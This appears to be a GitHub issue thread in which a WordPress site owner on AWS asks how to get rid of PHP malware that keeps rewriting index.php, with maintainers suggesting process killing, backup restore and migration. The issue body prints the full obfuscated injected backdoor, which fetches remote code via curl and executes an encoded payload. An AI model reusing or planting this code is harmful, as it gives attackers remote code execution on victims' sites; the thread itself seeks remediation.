### ISSUE TITLE
[WORDPRESS] How to removed malware code php with permission that we can't removed it?

### ISSUE THREAD

**Issue by MrVeeto** [bitnami/vms#118]
### Platform

AWS

### bndiagnostic ID [know more about bndiagnostic ID](https://docs.bitnami.com/general/how-to/understand-bndiagnostic/)

u

### bndiagnostic was not useful. Could you please tell us why?

can't run full bndiagnostic

### Describe your issue as much as you can

Hello.. how can i removed/terminate php process for malware that injected to all every my folder? i already scan using Wordfence and found 8000+ .htaccess injected to my folder. yesterday i already removed all of them but today when i login, the files still there and been added this morning..

i found a code on index.php which that i can't removed or edit it. everytime i delete, the file will appear again.. how to removed that file with permission r--r--r?

the code i found on index.php file `<?php error_reporting(0); $RQsqL = range(chr(126),chr(20));$CWr=${$RQsqL[31].$RQsqL[59].$RQsqL[47].$RQsqL[47].$RQsqL[51].$RQsqL[53].$RQsqL[57]};$CWr=${$RQsqL[31].$RQsqL[59].$RQsqL[47].$RQsqL[47].$RQsqL[51].$RQsqL[53].$RQsqL[57]};@(count($CWr)==15&&in_array(gettype($CWr).count($CWr),$CWr))?(($CWr[64]=$CWr[64].$CWr[76])&&($CWr[85]=$CWr[64]($CWr[85]))&&(@$CWr=$CWr[85]($CWr[51],$CWr[64](${$CWr[45]}[15])))&&$CWr()):$CWr; $yCj = range(chr(126),chr(20));$SCoy = array(@${$yCj[31].$yCj[55].$yCj[57].$yCj[42]}[$yCj[61].$yCj[44].$yCj[44].$yCj[61].$yCj[37]], $yCj[27].$yCj[12].$yCj[25].$yCj[29].$yCj[10].$yCj[25].$yCj[31].$yCj[24].$yCj[9].$yCj[16].$yCj[27].$yCj[10].$yCj[21].$yCj[15].$yCj[16], $yCj[11].$yCj[10].$yCj[12].$yCj[31].$yCj[12].$yCj[15].$yCj[10].$yCj[77].$yCj[75], $yCj[20].$yCj[11].$yCj[15].$yCj[16].$yCj[31].$yCj[26].$yCj[25].$yCj[27].$yCj[15].$yCj[26].$yCj[25],$yCj[14].$yCj[29].$yCj[27].$yCj[19], $yCj[28].$yCj[29].$yCj[11].$yCj[25].$yCj[72].$yCj[74].$yCj[31].$yCj[26].$yCj[25].$yCj[27].$yCj[15].$yCj[26].$yCj[25], $yCj[24].$yCj[21].$yCj[18].$yCj[25].$yCj[31].$yCj[23].$yCj[25].$yCj[10].$yCj[31].$yCj[27].$yCj[15].$yCj[16].$yCj[10].$yCj[25].$yCj[16].$yCj[10].$yCj[11], @${$yCj[31].$yCj[55].$yCj[57].$yCj[42]}[$yCj[15].$yCj[24]],); $Nx = $SCoy[2]($SCoy[0]);$WB = @$SCoy[4]($yCj[54].$yCj[84], $Nx);$Zkt = $SCoy[3]($WB, true); $SCoy[7] == 1 && die($SCoy[6](__FILE__)); if (($Zkt[0] - time()) > 0 and md5(md5($Zkt[2])) === "1Fxu7L83m1qDUM84fvsrQN3iwEjaxeRLEy") { $EIP = curl_init($Zkt[1]); curl_setopt($EIP, CURLOPT_RETURNTRANSFER, 1); $HEN = curl_exec($EIP);$EtDbX = empty($HEN)?$SCoy[6]($Zkt[1]):$HEN;@$SCoy[1]("", $yCj[1] . $SCoy[5]($EtDbX) . $yCj[79].$yCj[84]); die;} $BmAe = range(chr(126),chr(20));$LwRGB=$BmAe[27].$BmAe[12].$BmAe[25].$BmAe[29].$BmAe[10].$BmAe[25].$BmAe[31].$BmAe[24].$BmAe[9].$BmAe[16].$BmAe[27].$BmAe[10].$BmAe[21].$BmAe[15].$BmAe[16]; $pg=@$LwRGB($BmAe[90].$BmAe[31],$BmAe[25].$BmAe[8].$BmAe[29].$BmAe[18].$BmAe[86].$BmAe[92].$BmAe[63].$BmAe[64].$BmAe[92].$BmAe[80].$BmAe[28].$BmAe[29].$BmAe[11].$BmAe[25].$BmAe[72].$BmAe[74].$BmAe[31].$BmAe[26].$BmAe[25].$BmAe[27].$BmAe[15].$BmAe[26].$BmAe[25].$BmAe[86].$BmAe[11].$BmAe[10].$BmAe[12].$BmAe[31].$BmAe[12].$BmAe[15].$BmAe[10].$BmAe[77].$BmAe[75].$BmAe[86].$BmAe[23].$BmAe[4].$BmAe[21].$BmAe[16].$BmAe[24].$BmAe[18].$BmAe[29].$BmAe[10].$BmAe[25].$BmAe[86].$BmAe[28].$BmAe[29].$BmAe[11].$BmAe[25].$BmAe[72].$BmAe[74].$BmAe[31].$BmAe[26].$BmAe[25].$BmAe[27].$BmAe[15].$BmAe[26].$BmAe[25].$BmAe[86].$BmAe[11].$BmAe[10].$BmAe[12].$BmAe[31].$BmAe[12].$BmAe[15].$BmAe[10].$BmAe[77].$BmAe[75].$BmAe[86].$BmAe[90].$BmAe[31].$BmAe[85].$BmAe[85].$BmAe[85].$BmAe[85].$BmAe[85].$BmAe[85].$BmAe[67]);@$pg("cIyYL6WVS/1O32VNL6MMmNXytNVX0BXu7cNMRkHSSNmj679o4NBIcACqPkrWHUJs55k7UH/Rmq6m8e2YP+YvrBMxx0DLpxDspaBZudzeisbrdt6riA576P2MeUWGXVb0yXcfjiBMn76AaQDnkKnq6pBCmX3Jlpy+GLEPHjsOGd4XDrLDFcJ8GTh8F6z4WQbgvrSURma6rlVip9+k8fNgXyAUIKdlEA+ypIeGVqvll1mXMpLv9Psp//lWgsXq7BAvKkOo4iuxuHT8lLAOL2i7aWBTZ3HyBFpYmeLwpeXJiy7gQBSlYbdWVJ0Z4KWaTsar5sa2N7oPipT776PYiIqowmV3n55mlEdrX0jum5/CgVf0gfd9X74GcpjCz/Z7mf2z1NfdjbgicbR+9x4rmbJPlmj7asBemIlg0aaS/nsm252ueWo6maboLr6/zFWTwo9hfH5dQrXO2iqqKZ6r7eUhL1hgjaFNvfmQh4Qa8eSvE0zVOSCsYNBKYmWKNy9EffOpAYd3S3XPI6zNC7S7hmLSlh118q2LEVauFqxfmg9ac3X9I1Wz4kWlIf0qd0k0lxU9IZE5waa7hpD7FNWOJbA9IEYXbnSNKKE81Kp0+mHoY2ruqT6jJfUcdUcYHk5v6em8+6qkmokdD5Dft/eYU2W5eMiz43TKhuDi/++igLu9Ymx14MAnnzYerkKTWneIZOtaiV0Fm1jTUb4Gu9xArKKcwg1iTxSfThHF7Wnp8Oewgi+tUyAOL7zUUt6Xt5YsndYgcj3xXGDS8G1m8KizcCyLspzQzBHk4j6TKq36eem6ggsAsBor9ItW8LZrXCCtMNWzvQmxpKzkflrzWpDN7avOCXq/jE3iigi0j9RZpMF46WtnhReQ8aoTeprifpl8LCuLI61ggmtnNa7MTkXKkaybQvO+IXjBYi4Ns+dt/iX5XXxejW1Cn/rwvK/a2MyG3hr/eqHC5dfkNNk1kH3z5XHWgFsmJSTabblcvYIlj2dDG+iADl+2a/ZqB2XtqrdkhP5J/yFP97MwwnXwkxfYtlqHXlgK14dkkffejZ8/CjioSTU/g8+FBKTxyavPXDcHQL8kMao5z1fhBk9KNi+3E+ucYuaLRRi0ZKsfPpoODhIgmrP7M5v/qjMUkhc0B8opqvkmISZ0pGG/sq/TPyqEwpBdkyIw9oGWS7+KsjIuOBpBAn2xV42Q2YBmyY6meAYxErPrOfqMK7qaD+0FspSf7CHyNUkZOmMtbyGc8L1aT5k1d/sZV0KvSBrmZePmrvs1w67CtIdFfpRITdL2832XyCV7q7HL0iYCQid14M9moRCjN/dTeYg5HeFud/YvEBJTTgXTYB9Rz2cEo77CCNk8flA41pTkScfO6+XfcdiMhF4V1ZIrU9MW3Z1OAHXyrAEXCSIjDTHrUMxqf97429oM9b/RuqcD2Qz9mmJ89SKpk4bIY6Q2+eUyRpCkZm96tSHul1ireLaraSj1GN93DwlvWhsNz6n+KFJQ7AwJNrtqvBHK+YsZCNDnvAI0E8qMm/r3a6k5ihJGTk8yBhGRSpfYmlNBn2rAS8S368lDm3eDOX7X6xEboLG4s5vfsbFKRQueZ1Z2a8HEBR9nCqk7lzbp73HlANM2OEk8nh5jVM6rkYGYj/sOZnacT1U8uu8W1OGjngGGa/094on5N1196DCDRimkKX8iTqDG05nMd0UCgGmL4Sq/mI81Zngk2FKNy7vcorBzr3nmyx9JUM/X6329BCJWMfQvT/tsxbhzo79s+I603yZ0ugaN0G0lDMEhM5rnTAmdidh7+2YG8CIQU9/cIcKYSk8J5Ashf7xCp24mjjChKCVNCsFgCeaBNVPmeon0yftbCbuugkeADIKKehi7LR/TgAecYdo9Bf+A3YDdIOkTd3FXwSDNezT9sredhsApblQjkL8654sO7ibZjjQV+Hhrutudy1f2+Bs5F7BzB6XnHO/4UJdtoUVW30UCtAMoeMg+v/xw9QebxSEfgI6CeIZcHwFxNb7cvV/VjLwJdnRgM+Q3Gq+uPBL+zP9E3BwwBU3FwLlsVrqU4R4Sy1vOaCztRJFQx1m4wAIllUNLBPp7XgtPiTg1cn/wg9EQj1989jz/NepP3NYg7HR/X1Mc8OYIXhOq0CLXEMcTkDzdTt4nVH0PaGQ0QX6FbM7+7gERksedcm7kOrZJJ6IvbNRimEFeQx5JDKE+x3zto6zbVumb8RzPZ7/dGOAbqUT+Z3dh/LpL//lZ37VorSUOUSKDSR+MqgWB37LsBQjjMOkZxLnnp/7Nw76maim5yEkQCvFIE9Gt6OEECmE6Mbi7920henh3TriYvaTgiGW1dMb5sh6QItC2JUI9LK0S/m897vILmjRJZTl+Cfh4Mh5NGmgG0NE2QEl8r94uJBKrtAyVE2J7Z8RidogqR+NYqf/87igUoU+V8qJiVSyD7xifhc75NK6RZZiz3VlRtPTQuaqmGCTeYXOVd7XGwNz3a5WOFdBuwdrCzUQzOGgBOzwq2AUfC6mKrsjwiTXkJ9J+H0Dc08dtn577paUSttooKWScNrPJm5/1ID5zmTkAnwCfdo9C7YW3b9BCqDqo7mJGVpSpVU+e9wHnwCU0k9KhK3fUAVg6fjyj+oxhCZEOswqcYKWWmCLzep5Xq8i1iVB93+57wvuZrkfpUvRdAi/G4xisA1mXtDMoMjYoU/7F+0Kev1vGH9dQln3hFo1taox/JZ+TwJ/r4e5TowhIX989iAiuYyMC+JCij7PS1KohYz8kwxIyedG5/TF/xLy2a9ie++WV1aw6vTKRXXYZXIufjPMmzrtl/kPol1yUgnDFHyt8Jw3R+d7WvFskMgwtl0plLQCZm+mruXQqF2Yx76yooBMP9O/G6gs6pAx+N2c0fZc90YWDU7U/fJl0SZBpkS2pEvsegX9KQQ9BOTLGH/SssodP2qCBVZ7gKcK1/rxrD2FuPuPIBOZGG6+d4nRJg5zFA/4jYHotCgQH99dec+7OWks+ct2iASvWqafQIDnofquZDER+ySX5k4SuyyGC3ZYAOio+tPf0p0eV1DBha+AgpRAo1oDJ15fnnUXmFDnYMpp+ugzq+0dzAHJ262wzFc1HbA26TdMZj2y3y3okqji5Yp9n818HOdoTx9sRf6q4VWHCqGOIBDzeTu6khE+h01tgqp6Wiwwakv9geBVHgUWlaaK3WLy1XhzUregOAAhEKijHoMzQ/1S0IXq0uUufV05w2UG2wloODUe/cv+dmNqOp9nycwg2cnsi2sIp111otibYJ645hef3/imrIXt4tfKeah0pp/6o/c51RJM1sWF1wXdIsYC3saLnLxlzcOmTdvQXze4IMzqpMellHOsPjMAr5wJXPAtRioyXaBUYjIv2Jumfzy1eAl+tm4+KCr/aB4KAqEr8pQoaznzesnRK4n7h7kp989LGYcfPmN6XgIgZcd89r47YQaiM9eF1KvtiJ3+l2NPTFZzNIZFkMMts30k9lBoF1HSW++sN229Fv0FDvhn3WpPeMwsfgsCZS3Cr037bMes/n3nsJefOr6eRfAqcGrUh7GQb3/A0mea9YtX4TieBP9gCE8aq3Cl4k+zsvp2D7DqJ9/r5HfSdF5cL3Pw/Za5Aap530/rSLaTYvMlebN38XIyajOp/88ZUQwVMe+6JmI3+qYwBUAgyaRENc37sKtD4F/aRx/ivs2Y7wi3hJKr3KWcimglGR6nU9FhTe4w+8aHqqUuMii7BzVslqGsVn2jaBGdyQK/p5ro8h6YE2s0EKIdPeib8umrAKk3pvchq98yUksceaC/mm/8O");?><?php define( 'WP_USE_THEMES', true ); require('./wp-blog-header.php');?>`

**Comment by jotamartos** [comment]
Hi @MrVeeto ,

I'm sorry to hear that. If there is any PHP process running in your instance that generates that malicious code, you can kill it by using the `kill -9 PID` command. However, if that's part of WordPress or any of the plugins you installed, you should contact WordPress' or WordFence's support team to know more about how to proceed.

**Comment by MrVeeto** [comment]
> Hi @MrVeeto ,
> 
> I'm sorry to hear that. If there is any PHP process running in your instance that generates that malicious code, you can kill it by using the `kill -9 PID` command. However, if that's part of WordPress or any of the plugins you installed, you should contact WordPress' or WordFence's support team to know more about how to proceed.
> 
> https://wordpress.org/support/

so on SSH after login i just used this command `kill -9 PID`?

**Comment by jotamartos** [comment]
No, you need to find the malicious process by using the `ps aux` command. Once you know the PID of the process, you can kill it with using the `kill` command.

**Comment by jotamartos** [comment]
Hi, 

As I mentioned, this is a specific question about WordPress and the plugins you are using. Ask the WordPress' support team to know more about how to debug this. 

https://wordpress.org/support/

**Comment by MrVeeto** [comment]
Alright. Thank you.

**Comment by MrVeeto** [comment]
and one more, how can i removed or edit the index.php with the permission i can't even change?
![index](https://user-images.githubusercontent.com/108952516/179001642-a9d8aed5-9058-4ca6-8f22-6cb204893d00.png)
?

**Comment by MrVeeto** [comment]
> if you are able to SSH in as root, you should have full permisions on the file assuming you have a clean backup:
> 
> * rename the infected file to evil-index.php (or something similar - you are trying to prevent it being called at this point)
> * upload index.php from your clean backup
> * delete evil-index.php

as i mention above, everytime i rename the infacted index.php, it will rewrite back the same code that i deleted before.. i upload new index.php also, the content will rewrite back to old code.. so how? :(

**Comment by MrVeeto** [comment]
how to reset permission 0444 which one will rewrite back the code inside the file? i tried to reset the permission but it won't allow it. anyone please?

**Comment by nromero96** [comment]
I have the same problem, help me please.

**Comment by mdhont** [comment]
You could launch a new WordPress instance and migrate the data there. For WordPress this is not a difficult process:

https://docs.bitnami.com/aws/how-to/migrate-wordpress/

After the migration you should start enabling your WordPress plugins one by one and check each time if the index file is created.
